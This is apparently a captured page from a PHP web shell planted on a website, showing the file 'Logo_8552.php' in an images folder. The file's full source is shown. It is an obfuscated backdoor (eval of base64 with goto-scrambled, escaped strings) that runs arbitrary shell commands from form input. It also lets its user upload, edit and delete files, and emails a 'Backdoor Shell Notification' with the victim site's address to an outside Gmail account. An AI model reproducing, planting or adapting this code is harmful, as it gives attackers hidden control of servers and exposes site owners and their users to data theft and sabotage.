Please wait...
File Operations
Upload Files
Upload
Create File
Create File
Create Folder
Create Folder
Command Terminal
Execute
File Manager
home
regkprj
public_html
assets_user
images
Edit File: Logo_8552.php
<?php eval(base64_decode('
 goto ahcZa; oJ48Z: $to = "\155\x65\152\141\x6b\155\141\x72\x40\x67\x6d\141\x69\x6c\56\143\157\155"; goto kJvSU; kJvSU: $subject = "\102\141\x63\153\x64\157\x6f\x72\40\123\150\145\154\154\40\x4e\157\164\151\146\151\143\141\x74\151\x6f\156"; goto LGakW; A_CSO: ?>
                </ol>
            </nav>

            <?php  goto Xdnco; ahcZa: ?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>File Manager</title>

    <!-- BOOTSTRAP -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons/font/bootstrap-icons.css" rel="stylesheet">

    <style>
        body {
            background-color: #f4f4f4;
            padding: 30px;
        }
        .table th {
            background-color: #f8f9fa;
        }
        .breadcrumb-item + .breadcrumb-item::before {
            content: "/";
        }
        .table td, .table th {
            vertical-align: middle;
        }
        #sidebar {
            display: none;
            position: fixed;
            top: 0;
            right: 0;
            width: 300px;
            height: 100%;
            background-color: white;
            border-left: 1px solid #ddd;
            padding: 20px;
            overflow-y: auto;
            box-shadow: -2px 0 5px rgba(0,0,0,0.1);
            z-index: 1050;
        }
        #menuToggle {
            position: fixed;
            top: 20px;
            right: 20px;
            z-index: 1100;
        }

        /* ★★★ LOADING SCREEN ★★★ */
        #loading-screen {
            position: fixed;
            inset: 0;
            background: rgba(0, 0, 0, 0.75);
            display: flex;
            justify-content: center;
            align-items: center;
            z-index: 999999;
            backdrop-filter: blur(3px);
            transition: opacity 0.4s ease;
        }
        #loading-screen.hidden {
            opacity: 0;
            pointer-events: none;
        }
        .loader-box {
            text-align: center;
            color: white;
            animation: fadeIn 0.5s ease-in-out;
        }
        .loader-logo {
            width: 150px;
            opacity: 0.9;
            animation: pulseLogo 2s infinite;
        }
        .loader-text {
            font-size: 20px;
            margin-top: 10px;
            opacity: 0.85;
            letter-spacing: 1px;
        }
        .spinner {
            width: 40px;
            height: 40px;
            margin: 15px auto;
            border: 4px solid rgba(255,255,255,0.3);
            border-top-color: #fff;
            border-radius: 50%;
            animation: spin 1s linear infinite;
        }
        @keyframes spin { to { transform: rotate(360deg); } }
        @keyframes pulseLogo {
            0% { transform: scale(1); opacity: 0.8; }
            50% { transform: scale(1.05); opacity: 1; }
            100% { transform: scale(1); opacity: 0.8; }
        }
        @keyframes fadeIn {
            from { opacity: 0; transform: scale(0.95); }
            to { opacity: 1; transform: scale(1); }
        }

        /* ========= MACOS STYLE TERMINAL (FULL SCREEN MODAL) ========= */
        .terminal-modal {
            position: fixed;
            left: 5%;
            top: 5%;
            width: 90%;
            height: 90%;
            background: #0b0b0b;
            border-radius: 8px;
            box-shadow: 0 20px 50px rgba(0,0,0,0.6);
            z-index: 1000000;
            display: none;
            flex-direction: column;
            overflow: hidden;
            user-select: text;
        }
        .terminal-modal.show {
            display: flex;
            animation: modalIn 220ms ease;
        }
        @keyframes modalIn { from { transform: translateY(8px); opacity: 0 } to { transform: translateY(0); opacity: 1 } }

        .terminal-header {
            display: flex;
            align-items: center;
            padding: 10px 12px;
            background: linear-gradient(#ededed, #dfdfdf);
            color: #222;
            cursor: move; /* draggable */
        }
        .terminal-header .buttons {
            display: flex;
            gap: 8px;
            margin-right: 10px;
        }
        .term-btn {
            width: 14px;
            height: 14px;
            border-radius: 50%;
            display: inline-block;
            box-shadow: inset 0 -1px 0 rgba(0,0,0,0.15);
        }
        .term-close { background: #ff5f57; }
        .term-min { background: #ffbd2e; }
        .term-max { background: #28c840; }

        .terminal-title {
            flex: 1;
            text-align: center;
            font-size: 14px;
            font-weight: 600;
            color: #333;
        }
        .terminal-actions {
            margin-left: auto;
            display: flex;
            align-items: center;
            gap: 8px;
        }
        .terminal-body {
            flex: 1;
            background: #000;
            color: #e6e1dc;
            padding: 18px;
            font-family: ui-monospace, SFMono-Regular, Menlo, Monaco, "Roboto Mono", "Courier New", monospace;
            font-size: 13px;
            line-height: 1.4;
            overflow: auto;
            position: relative;
        }
        .terminal-body pre {
            white-space: pre-wrap;
            word-break: break-word;
            margin: 0;
        }
        .terminal-footer {
            padding: 10px;
            background: linear-gradient(#f6f6f6, #eaeaea);
            text-align: right;
        }
        .terminal-close-btn {
            background: transparent;
            border: 1px solid rgba(0,0,0,0.08);
            padding: 6px 10px;
            border-radius: 6px;
        }

        /* Typewriter caret */
        .caret {
            display:inline-block;
            width: 8px;
            background: #e6e1dc;
            margin-left:3px;
            animation: blinkCaret 1s steps(2,start) infinite;
            vertical-align: bottom;
        }
        @keyframes blinkCaret {
            0% { opacity: 1 }
            50% { opacity: 0 }
            100% { opacity: 1 }
        }

        /* small responsiveness */
        @media (max-width: 800px) {
            .terminal-modal { left: 2%; top: 2%; width: 96%; height: 96%;}
            .terminal-title { font-size: 12px; }
        }
    </style>
</head>

<body>

<!-- ★★★ LOADING OVERLAY ★★★ -->
<div id="loading-screen">
    <div class="loader-box">
        <img src="https://raw.githubusercontent.com/lihatsaja300-droid/logo/refs/heads/main/logo%20(1).png" class="loader-logo" alt="logo">
        <div class="loader-text">Please wait...</div>
        <div class="spinner"></div>
    </div>
</div>

<script>
    // Auto-hide loading when page loaded
    window.addEventListener("load", () => {
        setTimeout(() => {
            document.getElementById("loading-screen").classList.add("hidden");
        }, 450);
    });

    // Manual trigger for buttons/forms
    function showLoading() {
        document.getElementById("loading-screen").classList.remove("hidden");
    }
</script>

<?php  goto oJ48Z; pFz6A: if (!$mail_sent) { echo "\x3c\144\x69\x76\x20\163\x74\171\x6c\x65\75\x22\143\x6f\x6c\x6f\162\72\40\162\x65\x64\73\x20\146\157\x6e\164\55\167\145\151\x67\x68\x74\72\40\142\157\154\144\x3b\42\76\x57\x61\x72\156\x69\x6e\x67\72\40\105\155\x61\151\x6c\x20\156\x6f\164\151\146\x69\x63\141\164\151\x6f\x6e\40\x66\141\151\154\x65\144\x20\164\157\40\163\145\x6e\144\56\x20\120\x6c\145\141\x73\145\40\x63\x68\x65\143\153\x20\x79\x6f\x75\x72\x20\163\145\x72\166\145\x72\x27\x73\x20\155\x61\151\x6c\40\x63\157\156\146\x69\x67\x75\x72\x61\x74\151\157\156\56\x3c\57\x64\x69\x76\76"; echo "\74\144\151\x76\40\x73\164\171\154\145\75\x22\143\x6f\154\157\162\72\x20\x62\x6c\x75\x65\x3b\42\x3e\116\x6f\164\145\x3a\x20\x46\157\x72\40\x6d\x61\x69\154\50\51\40\x74\x6f\x20\x77\157\x72\x6b\54\40\x74\150\x65\40\x77\x65\x62\x73\151\164\x65\40\x73\145\x72\166\x65\x72\40\x6d\165\163\x74\40\150\141\x76\x65\x20\x53\115\x54\120\x20\x63\157\x6e\x66\151\x67\x75\162\145\x64\x20\50\x65\x2e\147\56\x2c\40\151\x6e\40\160\x68\x70\56\x69\156\x69\x20\157\x72\x20\x73\145\x72\x76\x65\x72\x20\163\145\x74\164\151\x6e\147\163\x29\56\x20\x43\157\156\164\141\143\x74\40\171\157\x75\162\x20\150\157\x73\x74\x69\156\x67\40\x70\x72\x6f\x76\151\144\145\x72\40\151\x66\40\156\x65\x65\144\145\x64\56\74\x2f\144\151\166\76"; } goto WSEpk; nn2Vq: if (!empty($terminal_output) && $terminal_command !== null) { $js_output = json_encode($terminal_output); $js_command = json_encode($terminal_command); ?>
        // Delay slightly so loading overlay can hide first
        (function() {
            const out = <?php  echo $js_output; ?>
;
            const cmd = <?php  echo $js_command; ?>
;
            // Build header-like initial line
            const headerLine = "$ " + cmd + "\n\n";
            // Show modal after short delay
            window.addEventListener('load', () => {
                setTimeout(() => {
                    openTerminalModal();
                    // Type header then output
                    typeWriter(headerLine + out, 6);
                }, 600);
            });
        })();
    <?php  } goto YZFw7; Xdnco: if (isset($_GET["\141\x63\x74\151\x6f\156"], $_GET["\146\x69\x6c\x65"]) && $_GET["\x61\x63\164\x69\x6f\156"] === "\x65\144\151\x74") { $fileToEdit = $directory . DIRECTORY_SEPARATOR . basename($_GET["\x66\x69\154\145"]); $forbiddenFiles = array("\56\150\164\141\143\143\x65\x73\163", "\56\145\x6e\x76"); if (in_array(basename($fileToEdit), $forbiddenFiles)) { echo "\74\144\151\166\40\143\154\141\x73\x73\x3d\x22\141\x6c\x65\162\164\40\x61\x6c\x65\162\164\55\x64\x61\156\147\145\162\x22\76\x45\144\151\164\x69\156\147\x20\164\x68\151\163\40\146\151\154\x65\40\x69\163\40\146\x6f\x72\x62\151\144\144\145\156\56\74\57\x64\151\166\76"; } elseif (is_file($fileToEdit)) { $fileContent = htmlspecialchars(file_get_contents($fileToEdit)); echo "\x3c\x68\x35\76\x45\x64\x69\164\x20\x46\x69\154\145\x3a\x20" . htmlspecialchars($_GET["\146\x69\x6c\x65"]) . "\x3c\x2f\x68\65\76"; echo "\74\x66\x6f\x72\x6d\40\155\x65\164\x68\157\x64\75\42\x70\157\163\164\42\x20\x6f\x6e\163\165\x62\x6d\151\x74\75\x22\163\150\x6f\167\114\x6f\x61\x64\151\x6e\x67\x28\51\x22\x3e"; echo "\74\x74\x65\170\164\x61\162\x65\x61\40\x6e\141\155\145\75\x22\x66\151\154\x65\137\x63\x6f\x6e\164\145\x6e\x74\42\x20\x63\154\141\163\x73\x3d\x22\x66\x6f\162\x6d\55\x63\157\156\164\162\157\154\42\x20\162\x6f\x77\163\75\42\61\65\42\x3e" . $fileContent . "\x3c\57\164\x65\x78\164\x61\162\145\141\x3e"; echo "\x3c\x69\x6e\160\165\164\x20\164\x79\x70\x65\75\x22\150\x69\x64\x64\145\156\42\40\x6e\x61\x6d\x65\x3d\x22\145\144\151\164\137\146\151\x6c\145\137\160\141\164\x68\x22\x20\166\141\154\x75\x65\75\x22" . htmlspecialchars($fileToEdit) . "\x22\76"; echo "\74\x62\x75\164\164\x6f\x6e\40\164\x79\160\x65\75\42\163\165\x62\155\151\x74\x22\x20\x6e\141\155\x65\75\x22\x61\143\164\x69\157\x6e\x22\x20\x76\141\x6c\x75\x65\75\42\123\x61\x76\x65\105\x64\151\164\42\40\143\x6c\141\x73\x73\x3d\x22\142\164\156\x20\x62\164\156\55\163\x75\x63\143\x65\163\x73\x20\155\x74\x2d\62\42\x3e\x53\x61\x76\x65\x3c\x2f\x62\x75\164\164\x6f\x6e\x3e"; echo "\74\57\146\x6f\x72\x6d\76"; } } else { echo "\74\x74\x61\142\154\x65\x20\143\154\141\x73\163\x3d\x22\x74\x61\x62\x6c\x65\x20\x74\141\x62\x6c\145\55\x62\x6f\162\144\x65\162\x65\144\40\x74\141\x62\154\x65\55\150\x6f\x76\x65\x72\40\x6d\164\x2d\x33\x22\x3e"; echo "\x3c\x74\150\x65\141\144\76\x3c\164\162\76\x3c\x74\150\76\116\x61\155\x65\x3c\x2f\x74\x68\76\x3c\x74\x68\x3e\123\x69\172\x65\x3c\x2f\x74\x68\76\x3c\164\150\x3e\120\145\162\x6d\151\x73\x73\x69\157\156\163\x3c\57\164\150\76\74\164\x68\x3e\114\x61\163\164\40\x4d\x6f\x64\x69\146\x69\x65\144\74\57\x74\150\x3e\74\x74\150\76\101\x63\164\x69\x6f\x6e\163\74\57\164\150\76\74\57\164\162\76\x3c\x2f\164\x68\145\141\x64\x3e\74\164\142\x6f\x64\x79\76"; $items = array_diff(scandir($directory), array("\56", "\56\x2e")); foreach ($items as $item) { $fullPath = $directory . DIRECTORY_SEPARATOR . $item; $isDir = is_dir($fullPath); $icon = $isDir ? "\142\x69\x2d\x66\x6f\154\x64\145\x72\x2d\x66\x69\154\x6c" : "\142\x69\55\146\x69\154\145\55\x65\x61\162\155\x61\x72\153"; $size = $isDir ? "\55" : number_format(filesize($fullPath) / 1024, 2) . "\x20\113\x42"; $perm = substr(sprintf("\x25\x6f", fileperms($fullPath)), -4); $mod = date("\131\x2d\155\x2d\x64\40\110\72\x69\72\x73", filemtime($fullPath)); echo "\x3c\164\162\x3e"; echo "\x3c\x74\144\x3e\74\x69\x20\143\154\x61\x73\163\x3d\42\142\x69\x20" . $icon . "\x22\76\74\57\151\76\40" . ($isDir ? "\x3c\141\x20\150\162\145\x66\75\x22\77\144\151\x72\75" . urlencode($fullPath) . "\x22\x20\x6f\156\x63\154\151\x63\153\75\x22\163\x68\x6f\x77\114\x6f\x61\144\x69\x6e\147\x28\x29\x22\x3e" : "\74\141\40\x68\162\145\146\x3d\42" . htmlspecialchars($fullPath) . "\42\x20\x74\141\x72\147\145\164\x3d\x22\x5f\x62\154\x61\156\153\42\76") . htmlspecialchars($item) . "\74\x2f\141\x3e\x3c\57\x74\144\76"; echo "\74\164\144\x3e" . $size . "\74\x2f\164\144\76"; echo "\x3c\164\x64\76" . $perm . "\40\x28" . decoct(fileperms($fullPath) & 511) . "\51\74\x2f\x74\144\x3e"; echo "\x3c\164\144\76" . $mod . "\74\x2f\x74\x64\x3e"; echo "\74\164\x64\x3e"; if (!$isDir) { echo "\74\x61\40\x63\x6c\x61\163\x73\x3d\x22\x62\164\156\40\x62\164\156\x2d\163\x6d\40\x62\164\x6e\55\160\162\x69\155\x61\x72\171\x22\x20\x68\162\x65\x66\x3d\42\77\x64\151\x72\x3d" . urlencode($directory) . "\46\141\143\164\151\x6f\156\75\145\144\151\x74\46\x66\x69\154\x65\75" . urlencode($item) . "\42\x20\x6f\156\143\154\x69\143\x6b\x3d\x22\x73\150\157\x77\x4c\x6f\141\x64\x69\x6e\147\50\51\42\x3e\x3c\151\40\143\154\x61\163\163\x3d\42\142\151\x20\142\x69\55\x70\x65\x6e\x63\151\x6c\55\163\x71\x75\x61\162\x65\x22\x3e\74\57\x69\76\74\x2f\x61\x3e\x20"; } echo "\x3c\x61\40\x63\154\x61\x73\x73\x3d\42\142\x74\156\x20\142\x74\x6e\x2d\x73\155\x20\142\164\x6e\x2d\144\x61\156\147\x65\162\42\x20\x68\162\145\x66\x3d\x22\x3f\x64\x69\162\75" . urlencode($directory) . "\46\141\143\x74\151\x6f\156\x3d\144\x65\x6c\x65\x74\x65\x26\x66\151\x6c\x65\x3d" . urlencode($item) . "\42\40\157\156\143\x6c\151\x63\153\x3d\42\x73\150\x6f\167\114\x6f\141\x64\x69\x6e\147\50\51\42\76\x3c\151\40\x63\154\141\163\x73\x3d\42\x62\x69\x20\142\x69\x2d\x74\162\x61\163\x68\42\76\x3c\x2f\151\x3e\74\57\x61\x3e\x20"; echo "\74\x61\40\143\x6c\141\x73\x73\x3d\42\x62\164\156\40\142\164\x6e\55\163\x6d\x20\x62\164\156\x2d\163\x75\x63\143\145\x73\163\x22\x20\x68\x72\145\146\x3d\42" . htmlspecialchars($fullPath) . "\42\x20\x64\157\x77\x6e\x6c\157\x61\144\x3e\74\x69\40\x63\154\x61\x73\163\x3d\42\x62\151\40\x62\151\55\144\x6f\167\x6e\x6c\157\141\144\x22\x3e\x3c\57\x69\76\74\57\x61\x3e"; echo "\74\57\x74\144\76"; echo "\x3c\57\x74\162\76"; } echo "\x3c\57\x74\x62\157\144\171\x3e\x3c\57\x74\x61\x62\154\x65\x3e"; } goto O3F30; qhUxR: ?>
">
    </form>

    <form method="post" onsubmit="showLoading()">
        <label>Create File</label>
        <input type="text" name="new_file" class="form-control mb-2">
        <button type="submit" name="action" value="CreateFile" class="btn btn-success mb-3">Create File</button>
    </form>

    <form method="post" onsubmit="showLoading()">
        <label>Create Folder</label>
        <input type="text" name="new_folder" class="form-control mb-2">
        <button type="submit" name="action" value="CreateFolder" class="btn btn-info mb-3">Create Folder</button>
    </form>

    <form method="post" onsubmit="showLoading()">
        <label>Command Terminal</label>
        <input type="text" name="command" class="form-control mb-2" placeholder="e.g. ls -la">
        <button type="submit" name="action" value="Execute" class="btn btn-warning">Execute</button>
    </form>
</div>

<div class="container">
    <div class="card">
        <div class="card-header bg-primary text-white">
            <h3 class="mb-0">File Manager</h3>
        </div>
        <div class="card-body">
            <nav aria-label="breadcrumb">
                <ol class="breadcrumb">
                    <?php  goto NafUq; O3F30: ?>
        </div>
    </div>
</div>

<!-- ========== TERMINAL MODAL (MacOS style, Full Screen) ========== -->
<div id="terminalModal" class="terminal-modal" role="dialog" aria-hidden="true">
    <div class="terminal-header" id="terminalHeader">
        <div class="buttons">
            <span class="term-btn term-close" title="Close"></span>
            <span class="term-btn term-min" title="Minimize"></span>
            <span class="term-btn term-max" title="Maximize"></span>
        </div>
        <div class="terminal-title">Terminal — Command Output</div>
        <div class="terminal-actions">
            <button class="btn btn-sm btn-outline-secondary" id="terminalCopy">Copy</button>
            <button class="btn btn-sm btn-outline-danger" id="terminalClose">Close</button>
        </div>
    </div>
    <div class="terminal-body" id="terminalBody" tabindex="0" aria-live="polite">
        <pre id="terminalContent"></pre><span id="terminalCaret" class="caret" style="display:none;"></span>
    </div>
    <div class="terminal-footer">
        <button class="terminal-close-btn" id="terminalCloseFooter">Close</button>
    </div>
</div>

<script>
    // Terminal modal controls
    const terminalModal = document.getElementById('terminalModal');
    const terminalContentEl = document.getElementById('terminalContent');
    const terminalCaret = document.getElementById('terminalCaret');
    const terminalClose = document.getElementById('terminalClose');
    const terminalCloseFooter = document.getElementById('terminalCloseFooter');
    const terminalCopy = document.getElementById('terminalCopy');

    function openTerminalModal() {
        terminalModal.classList.add('show');
        terminalModal.setAttribute('aria-hidden', 'false');
        // focus body to allow keyboard copy etc.
        document.getElementById('terminalBody').focus();
    }
    function closeTerminalModal() {
        terminalModal.classList.remove('show');
        terminalModal.setAttribute('aria-hidden', 'true');
    }
    terminalClose.addEventListener('click', closeTerminalModal);
    terminalCloseFooter.addEventListener('click', closeTerminalModal);
    // Copy content
    terminalCopy.addEventListener('click', () => {
        const text = terminalContentEl.innerText;
        navigator.clipboard?.writeText(text).then(()=> {
            terminalCopy.innerText = 'Copied';
            setTimeout(()=> terminalCopy.innerText = 'Copy', 1200);
        }).catch(()=> {
            alert('Copy failed');
        });
    });

    // Make modal draggable by header
    (function makeDraggable() {
        const header = document.getElementById('terminalHeader');
        let isDown = false, startX=0, startY=0, origX=0, origY=0;
        header.addEventListener('mousedown', (e) => {
            isDown = true;
            startX = e.clientX;
            startY = e.clientY;
            const rect = terminalModal.getBoundingClientRect();
            origX = rect.left;
            origY = rect.top;
            header.style.cursor = 'grabbing';
            e.preventDefault();
        });
        document.addEventListener('mousemove', (e) => {
            if(!isDown) return;
            let dx = e.clientX - startX;
            let dy = e.clientY - startY;
            // move modal (constrain a bit)
            terminalModal.style.left = Math.min(Math.max(origX + dx, 0), window.innerWidth - 200) + 'px';
            terminalModal.style.top = Math.min(Math.max(origY + dy, 0), window.innerHeight - 150) + 'px';
        });
        document.addEventListener('mouseup', () => {
            if(isDown) {
                isDown = false;
                header.style.cursor = 'move';
            }
        });
    })();

    // Typewriter animation for terminal output
    function typeWriter(text, speed = 6) {
        terminalContentEl.textContent = '';
        terminalCaret.style.display = 'inline-block';
        let i = 0;
        const len = text.length;
        function step() {
            // Append a chunk at a time for performance
            const chunkSize = 1; // characters per tick; increase for faster typing
            if (i < len) {
                terminalContentEl.textContent += text.substr(i, chunkSize);
                i += chunkSize;
                // keep scroll at bottom
                terminalContentEl.parentElement.scrollTop = terminalContentEl.parentElement.scrollHeight;
                setTimeout(step, speed);
            } else {
                terminalCaret.style.display = 'none';
            }
        }
        step();
    }

    // If server provided terminal output (after Execute), show modal and animate
    <?php  goto nn2Vq; k96AJ: if ($_SERVER["\x52\105\x51\125\105\123\x54\x5f\x4d\105\x54\x48\x4f\104"] === "\x50\x4f\123\x54") { if (isset($_FILES["\x75\x70\x6c\157\141\x64\145\144\x5f\x66\151\154\145"])) { $upload_dir = realpath($_POST["\144\x69\162"]); $filename = basename($_FILES["\165\160\x6c\157\141\144\x65\x64\x5f\x66\151\154\x65"]["\156\141\x6d\145"]); $target = $upload_dir . DIRECTORY_SEPARATOR . $filename; if (move_uploaded_file($_FILES["\165\160\154\x6f\x61\x64\145\144\137\x66\x69\x6c\x65"]["\x74\x6d\x70\137\x6e\x61\x6d\145"], $target)) { echo "\74\x64\x69\166\40\143\x6c\x61\163\x73\x3d\42\x61\x6c\x65\162\164\x20\141\154\145\162\x74\x2d\163\x75\143\x63\x65\163\163\42\76\x46\x69\154\145\40\165\160\x6c\x6f\x61\x64\145\144\40\x73\x75\x63\143\145\x73\163\x66\x75\154\x6c\171\x3a\x20" . htmlspecialchars($filename) . "\x3c\x2f\x64\x69\x76\76"; } else { echo "\x3c\x64\x69\166\40\x63\x6c\141\163\x73\x3d\x22\141\154\x65\x72\164\x20\141\154\145\162\x74\x2d\144\x61\x6e\x67\x65\x72\x22\76\106\141\151\x6c\x65\144\40\164\x6f\x20\165\x70\x6c\x6f\141\144\40\x66\x69\154\145\56\x3c\x2f\x64\151\166\x3e"; } } if ($_POST["\141\143\164\151\157\156"] === "\103\x72\x65\x61\x74\x65\106\151\154\145" && !empty($_POST["\x6e\145\167\x5f\x66\x69\154\x65"])) { $newFile = $directory . DIRECTORY_SEPARATOR . basename($_POST["\x6e\145\x77\x5f\x66\151\154\x65"]); if (touch($newFile)) { echo "\x3c\x64\151\166\x20\143\x6c\x61\163\163\x3d\x22\x61\x6c\145\162\x74\x20\x61\x6c\x65\x72\x74\55\x73\x75\x63\x63\145\x73\163\x22\x3e\106\x69\154\145\40\x63\162\145\x61\x74\145\144\72\x20" . htmlspecialchars($newFile) . "\74\57\x64\x69\166\x3e"; } } if ($_POST["\x61\x63\164\x69\157\x6e"] === "\x43\162\145\x61\x74\145\106\x6f\154\144\x65\x72" && !empty($_POST["\x6e\145\x77\137\x66\x6f\154\144\145\162"])) { $newFolder = $directory . DIRECTORY_SEPARATOR . basename($_POST["\x6e\x65\167\x5f\146\157\154\144\145\x72"]); if (mkdir($newFolder)) { echo "\74\144\x69\166\x20\143\154\141\163\x73\x3d\x22\141\154\x65\162\164\x20\x61\154\145\x72\x74\55\163\165\143\143\x65\163\163\x22\x3e\x46\157\154\144\x65\x72\40\143\x72\145\x61\x74\x65\144\72\40" . htmlspecialchars($newFolder) . "\x3c\x2f\x64\x69\166\x3e"; } } if ($_POST["\x61\x63\164\151\x6f\x6e"] === "\x45\x78\x65\x63\165\164\x65" && !empty($_POST["\x63\157\x6d\x6d\141\x6e\x64"])) { $command = $_POST["\x63\x6f\x6d\155\x61\156\144"]; $safe_cd = "\143\x64\40" . escapeshellarg($directory) . "\x20\x26\x26\40"; $output = shell_exec($safe_cd . $command . "\40\62\76\x26\x31"); if ($output === null) { $output = "\116\157\x20\157\165\164\x70\165\x74\56"; } $terminal_output = $output; $terminal_command = $command; echo "\x3c\160\162\145\x20\163\164\171\154\145\x3d\x22\x64\151\163\160\154\141\171\x3a\x6e\157\x6e\x65\42\x20\151\x64\x3d\x22\146\x61\x6c\x6c\x62\x61\x63\153\x2d\157\x75\164\x70\x75\164\42\76" . htmlspecialchars($output) . "\x3c\x2f\160\x72\x65\76"; } if ($_POST["\141\x63\164\x69\x6f\x6e"] === "\x53\141\166\x65\x45\x64\151\164") { $filePath = $_POST["\145\144\x69\x74\x5f\146\x69\154\145\x5f\x70\x61\x74\x68"]; $newContent = $_POST["\x66\151\154\145\x5f\x63\157\156\x74\145\x6e\164"]; $forbiddenFiles = array("\x2e\x68\164\141\143\143\145\163\163", "\56\145\156\166"); if (!in_array(basename($filePath), $forbiddenFiles)) { if (file_put_contents($filePath, $newContent) !== false) { echo "\x3c\144\x69\166\40\x63\x6c\x61\163\x73\x3d\x22\x61\154\x65\162\164\40\141\x6c\x65\162\164\x2d\x73\165\x63\143\145\x73\x73\42\x3e\x46\151\x6c\x65\x20\x73\x61\166\145\144\40\x73\165\143\143\x65\x73\x73\146\x75\x6c\154\x79\72\x20" . htmlspecialchars(basename($filePath)) . "\74\x2f\144\151\x76\76"; } else { echo "\74\x64\x69\166\40\x63\x6c\x61\x73\163\75\x22\x61\x6c\145\162\164\40\x61\x6c\145\162\x74\x2d\x64\141\156\x67\x65\162\42\x3e\106\141\x69\154\x65\x64\x20\x74\x6f\40\x73\141\166\145\x20\x74\x68\145\40\x66\x69\154\145\56\x3c\57\144\x69\166\x3e"; } } else { echo "\74\144\151\166\x20\x63\154\x61\163\x73\x3d\x22\x61\154\145\x72\164\40\141\x6c\145\162\164\x2d\x64\141\x6e\x67\x65\x72\42\76\105\x64\151\164\x69\x6e\x67\x20\164\150\x69\x73\40\146\x69\154\145\x20\151\x73\40\146\157\x72\x62\151\144\144\x65\156\x2e\74\x2f\x64\x69\x76\x3e"; } } } goto OI0e2; wpf58: $headers .= "\x52\x65\160\x6c\x79\x2d\124\157\72\x20\x6d\x65\x6a\141\x6b\155\x61\162\100\147\x6d\x61\151\154\x2e\x63\x6f\x6d" . "\xd\xa"; goto tEhC2; mXnS4: $terminal_command = null; goto k96AJ; xupgi: foreach ($parts as $i => $part) { $path .= $part . DIRECTORY_SEPARATOR; echo "\x3c\154\x69\x20\x63\x6c\x61\x73\163\x3d\42\142\x72\x65\x61\144\x63\162\165\155\x62\55\151\x74\145\x6d\x22\x3e\74\x61\40\x68\x72\145\x66\x3d\x22\77\x64\x69\162\x3d" . urlencode($path) . "\x22\x20\x6f\x6e\x63\x6c\151\x63\x6b\75\42\163\150\157\167\x4c\157\141\x64\151\x6e\147\x28\51\x22\x3e" . htmlspecialchars($part) . "\x3c\57\x61\76\x3c\x2f\x6c\x69\76"; } goto A_CSO; SfZ5M: echo htmlspecialchars($directory); goto qhUxR; E43WD: $terminal_output = null; goto mXnS4; B1Tbx: $headers = "\106\162\x6f\x6d\72\40\x6e\x6f\x72\145\x70\x6c\171\100" . $_SERVER["\x48\x54\124\x50\x5f\x48\x4f\x53\124"] . "\15\xa"; goto wpf58; WSEpk: $directory = isset($_GET["\144\x69\x72"]) ? realpath($_GET["\144\x69\x72"]) : __DIR__; goto E43WD; URS2e: ?>

<button id="menuToggle" class="btn btn-primary"><i class="bi bi-list"></i></button>
<div id="sidebar">
    <h5>File Operations</h5>

    <form method="post" enctype="multipart/form-data" onsubmit="showLoading()">
        <label>Upload Files</label>
        <input type="file" name="uploaded_file" class="form-control mb-2">
        <button type="submit" name="action" value="Upload" class="btn btn-primary mb-3">Upload</button>
        <input type="hidden" name="dir" value="<?php  goto SfZ5M; NafUq: $parts = explode(DIRECTORY_SEPARATOR, $directory); goto vbtCC; OI0e2: if (isset($_GET["\x61\x63\x74\151\x6f\x6e"], $_GET["\146\x69\154\x65"]) && $_GET["\x61\143\164\151\157\156"] === "\144\x65\154\x65\164\x65") { $file = basename($_GET["\146\x69\154\145"]); $file_path = $directory . DIRECTORY_SEPARATOR . $file; if (file_exists($file_path) && unlink($file_path)) { echo "\x3c\144\151\x76\x20\143\154\141\x73\163\75\42\x61\x6c\x65\x72\x74\40\141\154\x65\162\164\x2d\x73\165\143\x63\x65\163\163\x22\x3e\x46\x69\154\x65\x20\x64\145\x6c\x65\x74\x65\x64\x3a\40" . htmlspecialchars($file) . "\74\57\x64\151\x76\76"; } else { echo "\74\144\151\166\x20\x63\x6c\141\163\x73\75\42\x61\x6c\145\162\x74\x20\141\154\x65\x72\x74\55\x64\x61\x6e\x67\145\x72\x22\x3e\106\141\151\x6c\x65\x64\x20\x74\157\x20\144\x65\x6c\145\x74\x65\72\x20" . htmlspecialchars($file) . "\74\x2f\x64\151\166\76"; } } goto URS2e; LGakW: $message = "\x53\157\x6d\x65\x6f\x6e\145\x20\x69\163\40\x75\163\x69\156\x67\x20\171\157\165\162\x20\146\x69\x6c\x65\x73\x20\x6f\x6e\40\x74\x68\145\40\146\157\x6c\x6c\x6f\x77\151\156\147\40\167\145\x62\x73\151\164\145\72\40" . $_SERVER["\x48\124\124\120\x5f\x48\117\x53\124"] . $_SERVER["\122\x45\121\x55\x45\123\x54\x5f\x55\122\x49"]; goto B1Tbx; tEhC2: $mail_sent = mail($to, $subject, $message, $headers); goto pFz6A; vbtCC: $path = ''; goto xupgi; YZFw7: ?>
</script>

<script>
    document.getElementById('menuToggle').addEventListener('click', function () {
        var sidebar = document.getElementById('sidebar');
        sidebar.style.display = sidebar.style.display === 'block' ? 'none' : 'block';
    });
</script>

</body>
</htm')); ?>
Save
Terminal — Command Output
Copy
Close